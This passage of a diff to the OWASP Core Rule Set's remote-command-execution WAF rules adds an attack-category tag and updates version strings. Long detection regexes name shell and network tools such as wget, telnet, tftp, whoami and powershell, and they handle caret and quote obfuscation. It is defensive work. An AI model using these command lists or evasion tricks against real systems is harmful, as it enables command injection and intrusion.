(?:[\s\x0b&\),<>_\|]|$|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ysctl)|t(?:(?:ailf|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:l?sh(?:[\s\x0b&\),<>\|]|$)|p(?:ing|traceroute))|elnet|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$)))|u(?:n(?:(?:iq|rar|xz)(?:[\s\x0b&\),<>\|]|$)|lz(?:4(?:[\s\x0b&\),<>\|]|$)|ma)|pigz|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo)|w(?:get(?:[\s\x0b&\),<>\|]|$)|hoami)|x(?:(?:args|etex|more|pad|term)(?:[\s\x0b&\),<>\|]|$)|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more))|z(?:(?:c(?:at|mp)|diff|grep|less|more|run)(?:[\s\x0b&\),<>\|]|$)|[ef]grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|std(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less)))" \
     "id:932260,\
     phase:2,\
     block,\
@@ -530,9 +538,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -566,9 +575,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -607,9 +617,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -638,9 +649,10 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -659,9 +671,10 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -701,9 +714,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -735,9 +749,10 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -829,9 +844,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -852,7 +868,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932380
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\x0b]*[\s\x0b\"'\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:s[\"\^]*s[\"\^]*o[\"\^]*c|t[\"\^]*(?:m[\"\^]*a[\"\^]*d[\"\^]*m|t[\"\^]*r[\"\^]*i[\"\^]*b)|u[\"\^]*(?:d[\"\^]*i[\"\^]*t[\"\^]*p[\"\^]*o[\"\^]*l|t[\"\^]*o[\"\^]*(?:c[\"\^]*(?:h[\"\^]*k|o[\"\^]*n[\"\^]*v)|(?:f[\"\^]*m|m[\"\^]*o[\"\^]*u[\"\^]*n)[\"\^]*t)))|b[\"\^]*(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)[\"\^]*t|(?:d[\"\^]*e[\"\^]*h[\"\^]*d|o[\"\^]*o[\"\^]*t)[\"\^]*c[\"\^]*f[\"\^]*g|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|e[\"\^]*r[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|h[\"\^]*(?:c[\"\^]*p|d[\"\^]*i[\"\^]*r|g[\"\^]*(?:l[\"\^]*o[\"\^]*g[\"\^]*o[\"\^]*n|p[\"\^]*o[\"\^]*r[\"\^]*t|u[\"\^]*s[\"\^]*r)|k[\"\^]*(?:d[\"\^]*s[\"\^]*k|n[\"\^]*t[\"\^]*f[\"\^]*s))|l[\"\^]*e[\"\^]*a[\"\^]*n[\"\^]*m[\"\^]*g[\"\^]*r|m[\"\^]*(?:d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|s[\"\^]*t[\"\^]*p)|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|d[\"\^]*(?:c[\"\^]*(?:d[\"\^]*i[\"\^]*a[\"\^]*g|g[\"\^]*p[\"\^]*o[\"\^]*f[\"\^]*i[\"\^]*x)|e[\"\^]*(?:f[\"\^]*r[\"\^]*a[\"\^]*g|l)|f[\"\^]*s[\"\^]*(?:d[\"\^]*i[\"\^]*a|r[\"\^]*m[\"\^]*i)[\"\^]*g|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|r|s[\"\^]*(?:k[\"\^]*(?:c[\"\^]*o[\"\^]*(?:m[\"\^]*p|p[\"\^]*y)|p[\"\^]*(?:a[\"\^]*r[\"\^]*t|e[\"\^]*r[\"\^]*f)|r[\"\^]*a[\"\^]*i[\"\^]*d|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|p[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g))|n[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*d|(?:o[\"\^]*s[\"\^]*k[\"\^]*e|r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r)[\"\^]*y)|e[\"\^]*(?:n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e)|E[\"\^]*v[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*m[\"\^]*d|f[\"\^]*(?:c|i[\"\^]*(?:l[\"\^]*e[\"\^]*s[\"\^]*y[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*s|n[\"\^]*d[\"\^]*s[\"\^]*t[\"\^]*r)|l[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*p|o[\"\^]*r(?:[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)?|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|(?:t[\"\^]*y[\"\^]*p|v[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t)[\"\^]*e)|g[\"\^]*(?:e[\"\^]*t[\"\^]*(?:m[\"\^]*a[\"\^]*c|t[\"\^]*y[\"\^]*p[\"\^]*e)|o[\"\^]*t[\"\^]*o|p[\"\^]*(?:f[\"\^]*i[\"\^]*x[\"\^]*u[\"\^]*p|(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l[\"\^]*)?t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|r[\"\^]*a[\"\^]*f[\"\^]*t[\"\^]*a[\"\^]*b[\"\^]*l)|h[\"\^]*(?:e[\"\^]*l[\"\^]*p[\"\^]*c[\"\^]*t[\"\^]*r|o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e)|i[\"\^]*(?:c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s|f|p[\"\^]*(?:c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|x[\"\^]*r[\"\^]*o[\"\^]*u[\"\^]*t[\"\^]*e)|r[\"\^]*f[\"\^]*t[\"\^]*p)|j[\"\^]*e[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|k[\"\^]*(?:l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|t[\"\^]*(?:m[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|p[\"\^]*a[\"\^]*s[\"\^]*s))|l[\"\^]*(?:o[\"\^]*(?:d[\"\^]*c[\"\^]*t[\"\^]*r|g[\"\^]*(?:m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f))|p[\"\^]*[qr])|m[\"\^]*(?:a[\"\^]*(?:c[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e|k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r|l[\"\^]*i[\"\^]*n[\"\^]*k)|m[\"\^]*c|o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*o[\"\^]*l|q[\"\^]*(?:b[\"\^]*k[\"\^]*u[\"\^]*p|(?:t[\"\^]*g[\"\^]*)?s[\"\^]*v[\"\^]*c)|s[\"\^]*(?:d[\"\^]*t|i[\"\^]*(?:e[\"\^]*x[\"\^]*e[\"\^]*c|n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2)|t[\"\^]*s[\"\^]*c))|n[\"\^]*(?:b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t|e[\"\^]*t[\"\^]*(?:c[\"\^]*f[\"\^]*g|d[\"\^]*o[\"\^]*m|s[\"\^]*(?:h|t[\"\^]*a[\"\^]*t))|f[\"\^]*s[\"\^]*(?:a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*(?:h[\"\^]*a[\"\^]*r[\"\^]*e|t[\"\^]*a[\"\^]*t))|l[\"\^]*(?:b[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*s[\"\^]*t)|s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u[\"\^]*p|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|c[\"\^]*m[\"\^]*d[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*t|f[\"\^]*r[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*l))|o[\"\^]*(?:f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|p[\"\^]*(?:a[\"\^]*(?:g[\"\^]*e[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i|t[\"\^]*h[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|(?:b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|k[\"\^]*t[\"\^]*m[\"\^]*o)[\"\^]*n|e[\"\^]*(?:n[\"\^]*t[\"\^]*n[\"\^]*t|r[\"\^]*f[\"\^]*m[\"\^]*o[\"\^]*n)|n[\"\^]*p[\"\^]*u[\"\^]*(?:n[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*n[\"\^]*d|t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:p[\"\^]*d|w[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l)|r[\"\^]*n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|(?:d[\"\^]*r[\"\^]*v|m[\"\^]*n[\"\^]*g)[\"\^]*r|j[\"\^]*o[\"\^]*b[\"\^]*s|p[\"\^]*o[\"\^]*r[\"\^]*t|q[\"\^]*c[\"\^]*t[\"\^]*l)|u[\"\^]*(?:b[\"\^]*p[\"\^]*r[\"\^]*n|s[\"\^]*h[\"\^]*(?:d|p[\"\^]*r[\"\^]*i[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s))|w[\"\^]*(?:l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r|s[\"\^]*h))|q[\"\^]*(?:a[\"\^]*p[\"\^]*p[\"\^]*s[\"\^]*r[\"\^]*v|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|u[\"\^]*s[\"\^]*e[\"\^]*r|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|r[\"\^]*(?:d(?:[\"\^]*p[\"\^]*s[\"\^]*i[\"\^]*g[\"\^]*n)?|e[\"\^]*(?:f[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|g(?:[\"\^]*(?:i[\"\^]*n[\"\^]*i|s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2))?|l[\"\^]*o[\"\^]*g|(?:(?:p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|s[\"\^]*c[\"\^]*a)[\"\^]*)?n|x[\"\^]*e[\"\^]*c)|i[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|m[\"\^]*d[\"\^]*i[\"\^]*r|o[\"\^]*b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|p[\"\^]*c[\"\^]*(?:i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*i[\"\^]*n[\"\^]*g)|s[\"\^]*h|u[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|s[\"\^]*(?:a[\"\^]*n|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|w[\"\^]*c[\"\^]*m[\"\^]*d)|e[\"\^]*(?:c[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*t|r[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*(?:(?:c[\"\^]*e[\"\^]*i[\"\^]*p|w[\"\^]*e[\"\^]*r)[\"\^]*o[\"\^]*p[\"\^]*t[\"\^]*i[\"\^]*n|m[\"\^]*a[\"\^]*n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*m[\"\^]*d)|t[\"\^]*x)|f[\"\^]*c|(?:h[\"\^]*o[\"\^]*w[\"\^]*m[\"\^]*o[\"\^]*u[\"\^]*n|u[\"\^]*b[\"\^]*s)[\"\^]*t|x[\"\^]*s[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|y[\"\^]*s[\"\^]*(?:o[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o))|t[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n|p[\"\^]*i[\"\^]*c[\"\^]*f[\"\^]*g|s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t))|(?:c[\"\^]*m[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u|f[\"\^]*t)[\"\^]*p|(?:(?:e[\"\^]*l[\"\^]*n[\"\^]*e|i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u)[\"\^]*|r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*(?:p[\"\^]*)?)t|l[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*n|p[\"\^]*m[\"\^]*(?:t[\"\^]*o[\"\^]*o[\"\^]*l|v[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r)|s[\"\^]*(?:(?:d[\"\^]*i[\"\^]*s[\"\^]*)?c[\"\^]*o[\"\^]*n|e[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p|k[\"\^]*i[\"\^]*l[\"\^]*l|p[\"\^]*r[\"\^]*o[\"\^]*f)|y[\"\^]*p[\"\^]*e[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*f|z[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|u[\"\^]*n[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*s[\"\^]*e|i[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*i[\"\^]*d|l[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*t[\"\^]*r)|v[\"\^]*(?:o[\"\^]*l|s[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|w[\"\^]*(?:a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|(?:d[\"\^]*s|e[\"\^]*(?:c|v[\"\^]*t))[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|h[\"\^]*(?:e[\"\^]*r[\"\^]*e|o[\"\^]*a[\"\^]*m[\"\^]*i)|i[\"\^]*n[\"\^]*(?:n[\"\^]*t(?:[\"\^]*3[\"\^]*2)?|r[\"\^]*s)|m[\"\^]*i[\"\^]*c|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|x[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\x0b]*[\s\x0b\"'\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:s[\"\^]*s[\"\^]*o[\"\^]*c|t[\"\^]*(?:m[\"\^]*a[\"\^]*d[\"\^]*m|t[\"\^]*r[\"\^]*i[\"\^]*b)|u[\"\^]*(?:d[\"\^]*i[\"\^]*t[\"\^]*p[\"\^]*o[\"\^]*l|t[\"\^]*o[\"\^]*(?:c[\"\^]*(?:h[\"\^]*k|o[\"\^]*n[\"\^]*v)|(?:f[\"\^]*m|m[\"\^]*o[\"\^]*u[\"\^]*n)[\"\^]*t)))|b[\"\^]*(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)[\"\^]*t|(?:d[\"\^]*e[\"\^]*h[\"\^]*d|o[\"\^]*o[\"\^]*t)[\"\^]*c[\"\^]*f[\"\^]*g|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|e[\"\^]*r[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|h[\"\^]*(?:c[\"\^]*p|d[\"\^]*i[\"\^]*r|g[\"\^]*(?:l[\"\^]*o[\"\^]*g[\"\^]*o[\"\^]*n|p[\"\^]*o[\"\^]*r[\"\^]*t|u[\"\^]*s[\"\^]*r)|k[\"\^]*(?:d[\"\^]*s[\"\^]*k|n[\"\^]*t[\"\^]*f[\"\^]*s))|l[\"\^]*e[\"\^]*a[\"\^]*n[\"\^]*m[\"\^]*g[\"\^]*r|m[\"\^]*(?:d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|s[\"\^]*t[\"\^]*p)|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|d[\"\^]*(?:c[\"\^]*(?:d[\"\^]*i[\"\^]*a[\"\^]*g|g[\"\^]*p[\"\^]*o[\"\^]*f[\"\^]*i[\"\^]*x)|e[\"\^]*(?:f[\"\^]*r[\"\^]*a[\"\^]*g|l)|f[\"\^]*s[\"\^]*(?:d[\"\^]*i[\"\^]*a|r[\"\^]*m[\"\^]*i)[\"\^]*g|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|r|s[\"\^]*(?:k[\"\^]*(?:c[\"\^]*o[\"\^]*(?:m[\"\^]*p|p[\"\^]*y)|p[\"\^]*(?:a[\"\^]*r[\"\^]*t|e[\"\^]*r[\"\^]*f)|r[\"\^]*a[\"\^]*i[\"\^]*d|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|p[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g))|n[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*d|(?:o[\"\^]*s[\"\^]*k[\"\^]*e|r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r)[\"\^]*y)|e[\"\^]*(?:n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e)|E[\"\^]*v[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*m[\"\^]*d|f[\"\^]*(?:c|i[\"\^]*(?:l[\"\^]*e[\"\^]*s[\"\^]*y[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*s|n[\"\^]*d[\"\^]*s[\"\^]*t[\"\^]*r)|l[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*p|o[\"\^]*r[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|(?:t[\"\^]*y[\"\^]*p|v[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t)[\"\^]*e)|g[\"\^]*(?:e[\"\^]*t[\"\^]*(?:m[\"\^]*a[\"\^]*c|t[\"\^]*y[\"\^]*p[\"\^]*e)|o[\"\^]*t[\"\^]*o|p[\"\^]*(?:f[\"\^]*i[\"\^]*x[\"\^]*u[\"\^]*p|(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l[\"\^]*)?t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|r[\"\^]*a[\"\^]*f[\"\^]*t[\"\^]*a[\"\^]*b[\"\^]*l)|h[\"\^]*(?:e[\"\^]*l[\"\^]*p[\"\^]*c[\"\^]*t[\"\^]*r|o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e)|i[\"\^]*(?:c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s|p[\"\^]*(?:c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|x[\"\^]*r[\"\^]*o[\"\^]*u[\"\^]*t[\"\^]*e)|r[\"\^]*f[\"\^]*t[\"\^]*p)|j[\"\^]*e[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|k[\"\^]*(?:l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|t[\"\^]*(?:m[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|p[\"\^]*a[\"\^]*s[\"\^]*s))|l[\"\^]*(?:o[\"\^]*(?:d[\"\^]*c[\"\^]*t[\"\^]*r|g[\"\^]*(?:m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f))|p[\"\^]*[qr])|m[\"\^]*(?:a[\"\^]*(?:c[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e|k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r|l[\"\^]*i[\"\^]*n[\"\^]*k)|m[\"\^]*c|o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*o[\"\^]*l|q[\"\^]*(?:b[\"\^]*k[\"\^]*u[\"\^]*p|(?:t[\"\^]*g[\"\^]*)?s[\"\^]*v[\"\^]*c)|s[\"\^]*(?:d[\"\^]*t|i[\"\^]*(?:e[\"\^]*x[\"\^]*e[\"\^]*c|n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2)|t[\"\^]*s[\"\^]*c))|n[\"\^]*(?:b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t|e[\"\^]*t[\"\^]*(?:c[\"\^]*f[\"\^]*g|d[\"\^]*o[\"\^]*m|s[\"\^]*(?:h|t[\"\^]*a[\"\^]*t))|f[\"\^]*s[\"\^]*(?:a[\"